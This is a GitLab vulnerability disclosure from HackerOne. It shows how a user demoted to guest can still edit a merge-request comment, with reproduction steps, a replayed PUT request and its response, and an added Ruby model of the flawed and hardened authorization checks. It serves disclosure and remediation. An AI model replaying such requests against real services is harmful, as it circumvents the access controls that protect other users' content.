Guest Users can re-edit their comments on Merge Requests which they no longer have access to

HackerOne report #1212288 by cradlr on 2021-05-28, assigned to GitLab Team:


Report

Summary

A guest user can re-edit their comments in the Merge Request comment section when they no-longer have access to that Merge Request as a guest user.

We can fix this issue following the normal flow instead of the security flow, see #332646 (comment 592596619).

Steps to reproduce
  1. I have used Firefox containers to have multiple sessions in 1 browser. Create 2 user accounts in gitlab.com.
  2. From the main owner's account create a project -> create a Group. Invite a member to that Group with the privileges of owner.
  3. Create a project from the main owner's account under the group which has shared owner privileges.
  4. Switch to the invited user's session and Create an issue -> Create a Merge Request -> Then add the file.
  5. Now comment on the Merge Request from the main owner's account and put a reply to that comment from the invited user's account.
  6. Re-edit the response made by the invited user and push that request to repeater.
  7. Change the permissions of the invited user's account to guest and assign that particular merge request to the main owner from the main owner's account.
  8. Refresh the session of the invited user's account. 404 error message shows up.
  9. Switch to repeater and edit the response and fire the request. We get a 500 Server error message.
  10. Verify the changes from the main owner's account.
====================PUT REQUEST===========================  
PUT /test-groups2/owner-subgroup/inherited/notes/588153581 HTTP/1.1  
Host: gitlab.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/test-groups2/owner-subgroup/inherited/-/merge_requests/15  
X-CSRF-Token: REDACTED
X-Requested-With: XMLHttpRequest  
Content-Type: application/json;charset=utf-8  
Content-Length: 96  
Origin: https://gitlab.com  
Connection: close  
Cookie: REDACTED

{"target_type":"merge_request","target_id":101955619,"note":{"note":"hola. !rrrrrrrrrrrrrrrrr"}}

======================Response================================================  
HTTP/1.1 500 Internal Server Error  
Date: Fri, 28 May 2021 21:24:40 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 2926  
Connection: close  
Cache-Control: no-cache, no-store, max-age=0, must-revalidate  
Expires: Fri, 01 Jan 1990 00:00:00 GMT  
Pragma: no-cache  
X-Request-Id: 01F6TDTTP0E8VFGAW32MFJX5QX  
X-Runtime: 0.305979  
GitLab-LB: fe-06-lb-gprd  
GitLab-SV: web-33-sv-gprd  
CF-Cache-Status: DYNAMIC  
cf-request-id: 0a5676826400004e68cabbd000000001  
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"  
Strict-Transport-Security: max-age=31536000  
X-Content-Type-Options: nosniff  
Server: cloudflare  
CF-RAY: 656a8d170d744e68-FRA  
==========================================================================

Thanks,
Cradlr

Impact

Improper authorization leads to the re-edit of the comment for a guest user.
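The authorization gap the report describes, as an added Ruby example that is not GitLab's code: the vulnerable check verifies only that the requester authored the note, while the hardened check also re-verifies current read access to the merge request at edit time and turns a refused edit into a 404/403 rather than an unhandled 500. The guest visibility rule (an MR is visible to a guest only when assigned to them), the structs and all names are constructed assumptions.

```ruby
# Constructed model of the note-edit authorization check (not GitLab code).
ACCESS_LEVELS = { guest: 10, reporter: 20, developer: 30, owner: 50 }.freeze

Project      = Struct.new(:members)              # { user => access level symbol }
MergeRequest = Struct.new(:id, :project, :assignee)
Note         = Struct.new(:id, :author, :noteable, :body)

# Assumed rule: guests see a merge request only when it is assigned to them;
# any member above guest can always read it.
def can_read_merge_request?(user, mr)
  level = mr.project.members[user]
  return false if level.nil?
  return true if ACCESS_LEVELS[level] > ACCESS_LEVELS[:guest]
  mr.assignee == user
end

# Vulnerable check: ownership of the note is all that is verified, so an
# author who lost access to the merge request can still rewrite the note.
def can_edit_note_ownership_only?(user, note)
  note.author == user
end

# Hardened check: ownership AND current read access to the noteable.
def can_edit_note?(user, note)
  note.author == user && can_read_merge_request?(user, note.noteable)
end

# Handler in the style of a notes controller: a refused edit returns a clean
# status code instead of letting an exception surface as a 500.
def update_note(user, note, new_body)
  return [404, nil] unless can_read_merge_request?(user, note.noteable)
  return [403, nil] unless can_edit_note?(user, note)
  note.body = new_body
  [200, note.body]
end

# Scenario mirroring the report: the invited user edits their reply, is then
# demoted to guest, and the merge request is reassigned to the owner.
def scenario
  owner, invited = "owner", "invited"
  project = Project.new({ owner => :owner, invited => :owner })
  mr      = MergeRequest.new(15, project, invited)
  note    = Note.new(588153581, invited, mr, "original reply")
  before  = update_note(invited, note, "edited while member")
  project.members[invited] = :guest
  mr.assignee = owner
  after   = update_note(invited, note, "edited after demotion")
  { before: before, after: after, stale_check: can_edit_note_ownership_only?(invited, note) }
end
```

`stale_check` stays true after the demotion, which is exactly why an ownership-only check is insufficient.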

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Edited by Dominic Couture